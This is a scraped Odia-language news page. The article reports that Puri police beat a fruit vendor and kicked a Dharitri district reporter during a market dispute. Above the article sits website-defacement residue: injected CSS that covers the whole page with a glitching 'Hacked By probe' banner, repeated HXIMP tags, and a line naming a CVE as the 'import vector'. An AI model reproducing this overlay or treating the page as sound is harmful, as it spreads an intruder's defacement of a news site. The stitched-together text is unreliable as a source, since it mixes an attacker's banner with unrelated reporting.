html,body{margin:0!important;overflow:hidden!important}#hx-imp-overlay{position:fixed;inset:0;z-index:2147483647;background:#000;color:#0f0;font-family:monospace;display:flex;align-items:center;justify-content:center;text-align:center}#hx-imp-overlay .brand{font-size:clamp(3rem,12vw,8rem);font-weight:900;text-shadow:0 0 20px #0f0,0 0 60px #0f0;animation:hxgl 2.5s infinite}@keyframes hxgl{0%,94%,100%{transform:translate(0)}96%{transform:translate(-3px,2px)}98%{transform:translate(3px,-2px)}}
HXIMPKQR04E4X
`58; Hacked By probe `68;
[ HXIMPkqr04e4x ]
HXIMPkqr04e4x
CVE-2026-49049 | import vector

ପୁରୀ ପୋଲିସର ବର୍ବରତା: ଗରିବ ବ୍ୟବସାୟୀଙ୍କୁ କଲା ଲହୁ ଲୁହାଣ, ଧରିତ୍ରୀର ଜିଲ୍ଲା ପ୍ରତିନିଧିଙ୍କୁ ବି ଆକ୍ରମଣ

User Rating: 0 / 5

Star InactiveStar InactiveStar InactiveStar InactiveStar Inactive
 

ପୁରୀ:ପ୍ରଥମେ ଗରିବ ଫଳ ବ୍ୟବସାୟୀଙ୍କୁ ମାଡ ମାରିଲେ, ପରେ କର୍ତ୍ତବ୍ୟରତ ସାମ୍ବାଦିକକୁ ବୁଟ ମାଡ । ଏଭଳି ଘଟଣା ଘଟିଛି ପୁରୀ ବଡଶଙ୍ଖ ବଜାରରେ । ସୀମା ଟପିଛି ପୋଲିସ । 

ସୂଚନା ଅନୁସାରେ, ପୂର୍ବାହ୍ନରେ ଦୋକାନ ପକାଇବାକୁ ନେଇ ହାତାହାତି ହୋଇଥିଲେ ବ୍ୟବସାୟୀ ଓ ପୋଲିସ । ପରିସ୍ଥିତି ଏପରି ହୋଇଥିଲା କି ଲାଠି ମାଡରେ ଲହୁ ଲୁହାଣ ହୋଇଥିଲେ ଫଳ ଦୋକାନୀ ଦୀପକ ସାହୁ । ଘଟଣା ସ୍ଥଳରେ ଖବର ସଂଗ୍ରହ କରୁଥିବା ଧରିତ୍ରୀର ଜିଲ୍ଲା ପ୍ରତିନିଧି ଦତ୍ତତ୍ରୟ ନାୟକଙ୍କୁ ମଧ୍ୟ  ମାଡ ମରାଯାଇଥିଲା । ପୋଲିସ ଅଧିକାରୀଙ୍କ ଠାରୁ ଘଟଣା ବିଷୟରେ ପଚାରୁଥିଲି । ଠିକ ଏହି ସମୟରେ ୬/୭ ପୋଲିସ ଏକାଠି ଶ୍ରୀ ନାୟକଙ୍କୁ ତଳେ ପକାଇ ବୁଟରେ ମାଡ ଦେବା ସହ ଭିଡି ଭିଡି ଭ୍ୟାନରେ ବସାଇଥିଲେ । ପରିଚୟ ଦେଇଥିଲେ ମଧ୍ଯ ଶୁଣି ନଥିଲା ପୋଲିସ ବୋଲି ଅଭିଯୋଗ କରିଛନ୍ତି ସାମ୍ବାଦିକ ଶ୍ରୀ ନାୟକ । 

ଏନେଇ ବଡଶଙ୍ଖ ଠାରେ ସାମ୍ବାଦିକ ଶ୍ରୀ ନାୟକ ଧାରଣାରେ ବସିଥିଲେ । ଖୋଦ କୁମ୍ଭାରପଡା ଥାନା ଅଧିକାରୀ ବିଚିତ୍ରା ନନ୍ଦ ସେଠୀ ଓ ସିଟି ଡିଏସପି ଘଟଣାସ୍ଥଳରେ ଉପସ୍ଥିତ ଥାଇ ମଧ୍ୟ  ଘଟଣାକୁ ଉପଭୋଗ କରୁଥିଲେ ବୋଲି କହିଛନ୍ତି ସାମ୍ବାଦିକ ଶ୍ରୀ ନାୟକ।  ଯାହା ଏବେ ଚର୍ଚ୍ଚାର ବିଷୟ ପାଲଟିଛି । ପୋଲିସର ଏଭଳି କାର୍ଯ୍ୟକଳାପକୁ ସାଧାରଣରେ ନିନ୍ଦା କରାଯାଇଛି ।

0
0
0
s2sdefault